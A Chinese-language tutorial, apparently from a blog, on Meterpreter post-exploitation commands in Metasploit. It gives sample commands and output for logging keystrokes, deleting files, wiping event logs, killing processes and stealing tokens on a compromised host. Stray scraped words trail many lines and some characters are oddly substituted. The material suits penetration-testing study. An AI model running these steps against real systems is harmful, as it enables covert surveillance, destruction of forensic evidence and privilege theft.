Meterpreter是Metasploit框架中的一个杀手锏,一般做为利用漏洞后的攻击载荷所使用,攻击载荷在触发漏洞后可以返回给用户一个控制通道。当使用Armitage、MSFCLI或MSFCONSOLE获取到目标系统上的一个Meterpreter链接时,用户必须使用Meterpreter传递攻击载荷。MSFCONSOLE用于管理用户的会话,而Meterpreter则是攻击载荷和渗透攻击交互。本节将介绍Meterpreter的使用。shell
Meterpreter包括的一些常见命令以下所示。session
经过打开MSFCONSOLE实现控制。具体操做步骤以下所示。架构
(1)在MSFCONSOLE上启动一个活跃的会话。框架
(2)经过利用系统的用户启动登陆键盘输入。执行命令以下所示:post
meterpreter > keyscan_start Starting the keystroke sniffer…
从输出的信息中能够看到键盘输入嗅探已启动。日志
(3)捕获漏洞系统用户的键盘输入。执行命令以下所示:code
meterpreter > keyscan_dump Dumping captured keystrokes… <Return> www.baidu.com <Return> aaaa <Return> <Back> <Back> <Back> <Back> <Back>
以上输出的信息表示在漏洞系统中用户输入了www.baidu.com,aaaa及回车键、退出键。blog
(4)中止捕获漏洞系统用户的键盘输入。执行命令以下所示:token
meterpreter > keyscan_stop Stopping the keystroke sniffer…
从输出的信息中能够看到键盘输入嗅探已中止。进程
(5)删除漏洞系统上的一个文件。执行命令以下所示:
meterpreter > del exploited.docx
(6)清除漏洞系统上的事件日志。执行命令以下所示:
meterpreter > clearev [*] Wiping 57 records from Application… [*] Wiping 107 records from System… [*] Wiping 0 records from Security…
(7)查看正在运行的进程列表。执行命令以下所示:
输出的信息显示了漏洞系统中正在运行的全部进程,包括进程的ID号、进程名、系统架构、用户及运行程序的路径等。
(8)使用kill杀死漏洞系统中指定的进程号。执行命令以下所示:
meterpreter > kill 2040 Killing: 2040
(9)尝试从漏洞系统窃取一个假冒令牌。执行命令以下所示:
meterpreter > steal_token
注意:使用不一样的模块,Meterpreter中的命令是不一样的。有些模块中,可能不存在以上命令。